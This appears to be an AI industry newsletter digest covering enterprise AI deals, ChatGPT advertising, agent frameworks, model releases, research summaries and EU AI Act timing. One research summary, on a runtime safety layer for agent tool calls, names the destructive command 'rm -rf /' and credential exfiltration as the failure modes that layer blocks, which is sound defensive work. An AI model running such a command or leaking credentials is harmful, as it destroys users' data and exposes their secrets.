🎯 Top 3 Things to Know
1. EY and Microsoft announced a $1 billion, five-year alliance to push enterprise AI from pilots to production. The structural move is the staffing model: Microsoft's Forward Deployed Engineers sit next to EY industry consultants and co-build inside finance, tax, risk, HR, and supply-chain workflows in regulated sectors. EY is "client zero," scaling Microsoft 365 Copilot to 400,000 employees after a 150,000-seat rollout it credits with a 15% productivity lift. Relevant for any organization where AI pilots stall on integration, governance, and change management rather than model quality. Watch whether the FDE pattern shows up at other system integrators in the next quarter, since it would mean the consulting industry is rebundling around vendor engineering capacity. Microsoft Source
2. OpenAI launched a self-serve Ads Manager inside ChatGPT, opening the assistant to direct advertiser campaigns. The platform lets advertisers create, target, and optimize campaigns directly in ChatGPT, and arrives the same week Klarna's Shopping Search app went live in the assistant with 100 million products from 400 million listings across 13 markets. OpenAI is reportedly targeting $2.5 billion in ad revenue this year and $100 billion by 2030. The friction this addresses is platform unit economics: subscription revenue alone has not covered inference cost at scale. For teams building on ChatGPT, the change reshapes the surface they are competing for and the incentives behind ranking. Worth watching the first transparency report on how organic and paid results are differentiated inside conversations. The AI Marketers recap
3. Block open-sourced Goose, a developer framework for building local AI agents that span machine, tools, and connected services. Goose is pitched as a way to build agents without stitching together half a dozen SDKs, and ships with adapters to common developer services and the Model Context Protocol. The bet, under Jack Dorsey's renewed focus on developer tooling, is that open infrastructure will pull builders away from closed vertical agent platforms. For teams evaluating agent frameworks, Goose is worth a side-by-side against LangGraph and CrewAI on the actual workflows already in production. Watch ecosystem signal: server count, community PRs, and whether the first non-Block production deployments surface within 60 days. Coverage
🚀 Frontier Models & Features
- Gemini 3.5 Flash is now the default model in Google Search AI Mode, globally. Google is pushing a Flash-tier model into the highest-volume surface it owns, citing sustained frontier performance on agentic and coding tasks at lower cost. Google blog
- Anthropic's Fast mode added Claude Opus 4.7 as a research preview. Faster token generation at premium pricing, aimed at agent loops where latency, not raw cost, is the bottleneck. Anthropic news
- Claude Developer Platform shipped cache diagnostics in public beta. The API now explains where a prompt cache prefix diverged from the previous turn, removing one of the more frustrating opaque failure modes in long-running agent loops. Anthropic news
🔬 Research Worth Reading
AgentTrust: Runtime Safety Evaluation and Interception for AI Agent Tool Use (Yang / arXiv). arXiv
- TL;DR: A runtime safety layer that sits between an agent and its tools, normalizes obfuscated shell commands, detects multi-step attack chains, and returns a structured allow/warn/block/review verdict before each tool call executes.
- Stat: Targets the failure mode where a single misjudged action, like
rm -rf /or a credential exfiltrated through a benign-looking POST, causes irreversible damage in production agent deployments. - Apply it: Before granting an agent broad shell or HTTP access, add an interception layer that logs and classifies every tool call, then sample-review the "warn" bucket weekly. Start with file-system and credential operations, where the blast radius is widest.
SkillGenBench: Benchmarking Skill Generation Pipelines for LLM Agents (Zhou, Zhang et al. / SJTU and QuantaAlpha). arXiv
- TL;DR: A controlled protocol that feeds raw corpora to a "skill generator" and then executes the resulting standardized skill artifacts under a fixed harness, so different skill-generation methods can be compared head-to-head instead of through cherry-picked demos.
- Stat: The benchmark unifies skill execution and evaluation across pipelines, replacing the current ad-hoc setup where each skill-generation paper reports on its own bespoke harness.
- Apply it: If a team is letting an agent auto-generate reusable skills from documentation, route those generated skills through a fixed eval harness before promotion, rather than judging them by their first successful run.
🏢 Enterprise in the Wild
- Klarna's Shopping Search app launched inside ChatGPT. Live prices, availability, and offers from 100 million products and 400 million listings across 13 markets, surfaced inside the assistant conversation. PYMNTS
- Netflix handed ad-buying to AI agents. Ad-placement workflows are being run by agents with budget authority, an early test of agentic procurement in a regulated category. Reference
- Anthropic shipped 20+ legal MCP connectors and 12 practice-area plugins for law firms and in-house teams, covering research, contracts, discovery, and matter management. Anthropic news
🛠️ Tooling & Ecosystem
- Block released Goose, an open-source agent framework, covered in the Top 3. Coverage
- OpenAI Codex graduated Goal mode out of preview. Codex can now work toward a stated milestone for hours or days, with check-in and pause as the primary control surface rather than per-step approval. Reference
- Anthropic Claude for Small Business brings Claude into QuickBooks, PayPal, HubSpot, Canva, Docusign, and Google Workspace with prebuilt workflows. Anthropic news
⚖️ Policy & Regulation
- EU AI Act timeline relief is moving toward formal adoption. The May 7 political agreement between Council, Parliament, and Commission postpones high-risk obligations under Annex III from August 2026 to December 2027 and narrows the high-risk scope. Two new prohibitions, on AI-generated non-consensual intimate imagery and CSAM, take effect December 2, 2026. Formal adoption is expected by July, before the original August 2026 deadline would have triggered. Inside Privacy
📌 Watch List
- Pilot-to-production scaling at large enterprises and the consulting structures forming around it.
- Self-serve ad surfaces and agentic commerce inside chat assistants.
- Open-source agent frameworks competing with closed vertical platforms.
- Runtime tool-call interception as a standard layer in agent stacks.
- Chinese open-weight coding models closing the cost gap on Western frontier inference.